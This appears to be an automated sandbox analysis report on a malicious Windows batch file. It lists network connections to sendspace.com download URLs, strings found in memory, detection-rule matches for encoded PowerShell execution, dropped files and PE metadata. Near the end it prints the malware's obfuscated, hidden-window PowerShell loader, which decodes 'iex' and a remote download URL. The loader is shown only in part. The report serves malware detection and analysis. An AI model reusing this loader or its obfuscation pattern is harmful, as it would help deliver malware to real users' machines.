Source: global traffic HTTP traffic detected: GET /dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxiGHOFrHH77.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: fs13n4.sendspace.comConnection: Keep-AliveCookie: SID=7snc8sd5begfi8v3gnpjgpo9j3
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs03n2.sendspace.com
Source: global traffic DNS traffic detected: DNS query: fs13n4.sendspace.com
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: powershell.exe, 00000005.00000002.1992900389.0000000007948000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: java.exe0.8.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B692E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fs03n2.sendspace.com
Source: wab.exe, 00000008.00000002.2390087315.0000000021CF0000.00000004.00000010.00020000.00000000.sdmp, Uninstall.exe.8.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Au3Info_x64.exe.8.dr String found in binary or memory: http://www.autoitscript.com/autoit3/
Source: Au3Info_x64.exe.8.dr String found in binary or memory: http://www.autoitscript.com/autoit3/8
Source: AutoIt3_x64.exe.8.dr String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: javacpl.exe.8.dr, java.exe.8.dr, GoogleUpdate.exe.8.dr, java.exe0.8.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1984224760.00000000050C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBfq
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n2.sendspaX
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n2.sendspace.com
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B68F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B691B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B4FD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6917000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fs03n2.sendspace.com/dlpro/90cd9178b57ca9e755cc53ffd63d0a44/664f9440/wlorhs/Undertaker.pcx
Source: wab.exe, 00000008.00000002.2375969322.00000000062EC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946722033.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n4.sendspace.com/
Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n4.sendspace.com/ace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJ
Source: wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2375969322.00000000062E2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1946764965.00000000062F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://fs13n4.sendspace.com/dlpro/525cc5bd045f79d6fc570e988ce77b0f/664f945a/g1h76h/ZzDmwvhJScPuYqxi
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.dr String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
Source: notification_click_helper.exe.8.dr, elevation_service.exe.8.dr, pwahelper.exe.8.dr String found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B5DDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2169302600.000001E2C4BB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1989436125.000000000612E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: AutoIt3Help.exe.8.dr String found in binary or memory: https://www.autoitscript.com/site/autoit/8
Source: AutoIt3Help.exe.8.dr, Au3Info_x64.exe.8.dr, AutoIt3_x64.exe.8.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2059336952.000001E2B6426000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com
Source: wab.exe, 00000008.00000002.2375969322.0000000006288000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/
Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.2389809411.0000000021530000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000003.1934006716.00000000062F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/g1h76h
Source: wab.exe, 00000008.00000002.2375969322.00000000062C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/g1h76hMU
Source: powershell.exe, 00000002.00000002.2059336952.000001E2B4D6D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsP
Source: powershell.exe, 00000005.00000002.1984224760.000000000521B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sendspace.com/pro/dl/wlorhsXRwl
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.17:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown HTTPS traffic detected: 69.31.136.57:443 -> 192.168.2.4:49739 version: TLS 1.2

System Summary

Source: amsi32_7844.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6465
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6489
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Windows\svchost.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8AAB16 2_2_00007FFD9B8AAB16
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8AB8C2 2_2_00007FFD9B8AB8C2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD9B8A0D35 2_2_00007FFD9B8A0D35
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Check.exe 07FB7F6D9498BAE332E45617ACEA5CECB4186218AA8F1EB934AB2D48BA8FEB05
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info.exe 6805AA9ADE6C02506EE0E7E4DB52927B8336BC13FA3C10D9B4525B7297A61676
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe 4EC88EB380899460D7DF0DFC23E52CD4320306AAA2954AB78B1A5EF0CA3BD77C
Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe 2B94D13DCF7D675C9A74E92FAC2B31C4DF2F392ACE777A94C89D431979E52A89
Source: AppVDllSurrogate.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: officeappguardwin32.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: officeappguardwin32.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate32.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AppVDllSurrogate64.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: 68k Blit mpx/mux executable
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: OfficeScrSanBroker.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: AppVLP.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Integrator.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: PerfBoost.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: MpCmdRun.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: MpDlpCmd.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: VC_redist.x64.exe.8.dr Static PE information: Resource name: RT_ICON type: VAX-order 68K Blit (standalone) executable
Source: integrator.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: UcMapi.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: UcMapi.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: UcMapi.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver p\327G\200<)
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Au3Check.exe.8.dr Static PE information: Resource name: RT_GROUP_ICON type: DOS executable (COM, 0x8C-variant)
Source: Aut2exe.exe.8.dr Static PE information: Resource name: RT_ICON type: 370 XA sysV executable not stripped - version 6657 - 5.2 format
Source: Aut2exe_x64.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: upx.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: ai.exe0.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver \240\357E)
Source: OLicenseHeartbeat.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: SciTE.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: Uninstall.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: AdobeARMHelper.exe.8.dr Static PE information: Resource name: RT_ICON type: PDP-11 pure executable - version 69
Source: AdobeARMHelper.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: AdobeARMHelper.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jaureg.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: jucheck.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jucheck.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: jusched.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: jusched.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: grv_icons.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: java.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM)
Source: javaw.exe.8.dr Static PE information: Resource name: RT_ICON type: DitPack archive data
Source: javaws.exe.8.dr Static PE information: Resource name: RT_ICON type: COM executable for DOS
Source: GoogleCrashHandler.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (block device driver)
Source: GoogleCrashHandler64.exe.8.dr Static PE information: Resource name: RT_ICON type: 386 compact demand paged pure executable not stripped
Source: GoogleUpdateCore.exe.8.dr Static PE information: Resource name: RT_ICON type: Aarch64 COFF executable, not stripped, 66 sections, symbol offset=0x42aa70, 181 symbols, optional header size 43644, created Thu Jan 1 00:03:22 1970
Source: GoogleUpdateCore.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: pubs.exe.8.dr Static PE information: Resource name: RT_ICON type: DOS executable (COM, 0x8C-variant)
Source: OcPubMgr.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: AppVDllSurrogate64.exe.8.dr Static PE information: Resource name: RT_ICON type: TTComp archive data, binary, 1K dictionary
Source: PerfBoost.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: MpCmdRun.exe0.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: misc.exe.8.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\200"
Source: misc.exe.8.dr Static PE information: Resource name: RT_ICON type: MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "\353\377"
Source: pj11icon.exe.8.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_MSB_FIRST
Source: SQLDumper.exe.8.dr Static PE information: Data appended to the last section found
Source: AdobeARMHelper.exe.8.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController64.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateCore.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate.exe.8.dr Static PE information: Data appended to the last section found
Source: dbcicons.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate64.exe.8.dr Static PE information: Data appended to the last section found
Source: osmclienticon.exe.8.dr Static PE information: Data appended to the last section found
Source: msoev.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdate.exe.8.dr Static PE information: Data appended to the last section found
Source: javaw.exe.8.dr Static PE information: Data appended to the last section found
Source: MsMpEng.exe.8.dr Static PE information: Data appended to the last section found
Source: Au3Info.exe.8.dr Static PE information: Data appended to the last section found
Source: aimgr.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateBroker.exe.8.dr Static PE information: Data appended to the last section found
Source: Au3Info_x64.exe.8.dr Static PE information: Data appended to the last section found
Source: PerfBoost.exe.8.dr Static PE information: Data appended to the last section found
Source: javaws.exe.8.dr Static PE information: Data appended to the last section found
Source: aimgr.exe0.8.dr Static PE information: Data appended to the last section found
Source: Common.DBConnection.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateOnDemand.exe.8.dr Static PE information: Data appended to the last section found
Source: SDXHelper.exe.8.dr Static PE information: Data appended to the last section found
Source: upx.exe.8.dr Static PE information: Data appended to the last section found
Source: Au3Check.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleCrashHandler.exe.8.dr Static PE information: Data appended to the last section found
Source: sscicons.exe.8.dr Static PE information: Data appended to the last section found
Source: armsvc.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVLP.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleCrashHandler64.exe.8.dr Static PE information: Data appended to the last section found
Source: Microsoft.Mashup.Container.Loader.exe.8.dr Static PE information: Data appended to the last section found
Source: AppSharingHookController.exe.8.dr Static PE information: Data appended to the last section found
Source: AutoIt3Help.exe.8.dr Static PE information: Data appended to the last section found
Source: Uninstall.exe.8.dr Static PE information: Data appended to the last section found
Source: AppVDllSurrogate32.exe.8.dr Static PE information: Data appended to the last section found
Source: Wordconv.exe.8.dr Static PE information: Data appended to the last section found
Source: chrome.exe.8.dr Static PE information: Data appended to the last section found
Source: VSTOInstaller.exe.8.dr Static PE information: Data appended to the last section found
Source: MpDlpCmd.exe.8.dr Static PE information: Data appended to the last section found
Source: java.exe.8.dr Static PE information: Data appended to the last section found
Source: MpCopyAccelerator.exe.8.dr Static PE information: Data appended to the last section found
Source: ConfigSecurityPolicy.exe.8.dr Static PE information: Data appended to the last section found
Source: grv_icons.exe.8.dr Static PE information: Data appended to the last section found
Source: GoogleUpdateComRegisterShell64.exe.8.dr Static PE information: Data appended to the last section found
Source: amsi32_7844.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7596, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7844, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: VC_redist.x64.exe.8.dr Static PE information: Section: .reloc ZLIB complexity 1.0107421875
Source: classification engine Classification label: mal100.spre.troj.evad.winCMD@14/164@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Fettle.Han
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dykonr4d.1i4.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7596
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7844
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\las.cmd" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$sublicense = 1;$Solbatteri='Sub';$Solbatteri+='strin';$Solbatteri+='g';Function Udvindende($Twistende){$Lastelinie=$Twistende.Length-$sublicense;For($Firblok=5;$Firblok -lt $Lastelinie;$Firblok+=6){$lunelsen+=$Twistende.$Solbatteri.Invoke( $Firblok, $sublicense);}$lunelsen;}function Unschool($Squimmidge){. ($Jetmotoren) ($Squimmidge);}$Pedicures=Udvindende 'TestiMMiljloInterzShel iMil.elCol.clBifigaOvers/Stepp5Ne kw. A er0Ego r Konku(IndskWin vii.ernin kaksdTrilloByggewKoreisDu,st O,debN XenoTPrisl Matem1Unher0 Inla.Pr,fa0Samme;Ote.t BrnesW ,isciAureanSenso6Under4glyce; ihra NotatxSoci 6 F.ap4Terzi; Honn Gyro.rHoultv S,ns:spell1Oli.t2Indbl1s end.Capit0Kratt)C,oic genetGRysteePremac,mudskNonuboDevis/ S or2Misdd0.dgan1Misha0Stjyd0Velst1Haa d0 S,ip1.ndig NoradFOr iei nergrSe ereDy.tbfFluoroIndpaxSludr/Mod.r1spu.r2 Smut1Ugl,d.Ingra0Se ue ';$Privileged=Udvindende 'Ob,diUA.dsesMsk,ne ,arar Matr-Jord.AUterog reeseBe trnTe.tatDis i ';$Sprngningers=Udvindende 'juncah,ripyt Sfyrtsupr.pFa.lesF,rpo:Prunt/Argum/ D.scwElskowMumifw hers.DollasacidoeSemilnmisled lyndsImparpKendea unnic ugeaeThist.DokhacOmnipo ugtim.allw/Curetp O firStipuoGl zi/Guerid SkablBa st/JogurwIntralVitr oShirtrSamfuhSlvsmsSk,dk ';$Forlovede=Udvindende 'Rel,a>R,kla ';$Jetmotoren=Udvindende 'Cor,ii KliseCuchix Kyse ';$Tendrilous='Handleformerne';$Veta13 = Udvindende 'SkytseCentrcAllithUnguio Tu.i ,ndka%mbleraMonocp IntepForstd FiliaHikketTeg,vaya.ne% Ou.w\CytopFVetere,likvtSa.tltA.riglMelleeJakob.TugteHToilfaUn,ernPuebl Folk&Nonpa&L.dar Xx.ndeDeamic RegihIncanoRhila Betint.agua ';Unschool (Udvindende 'Flo,r$CyprigLevnelSluk oUns ib In.laCompulR,tsf:NedgrSovertaSjofllUdsteuSorbet Druke waver.uadresnil,r Samo=Hneky(YderzcNain m Compd arga Helt/HetercDekup ,ylli$AskebVDusineFlowetHal,taFar,e1 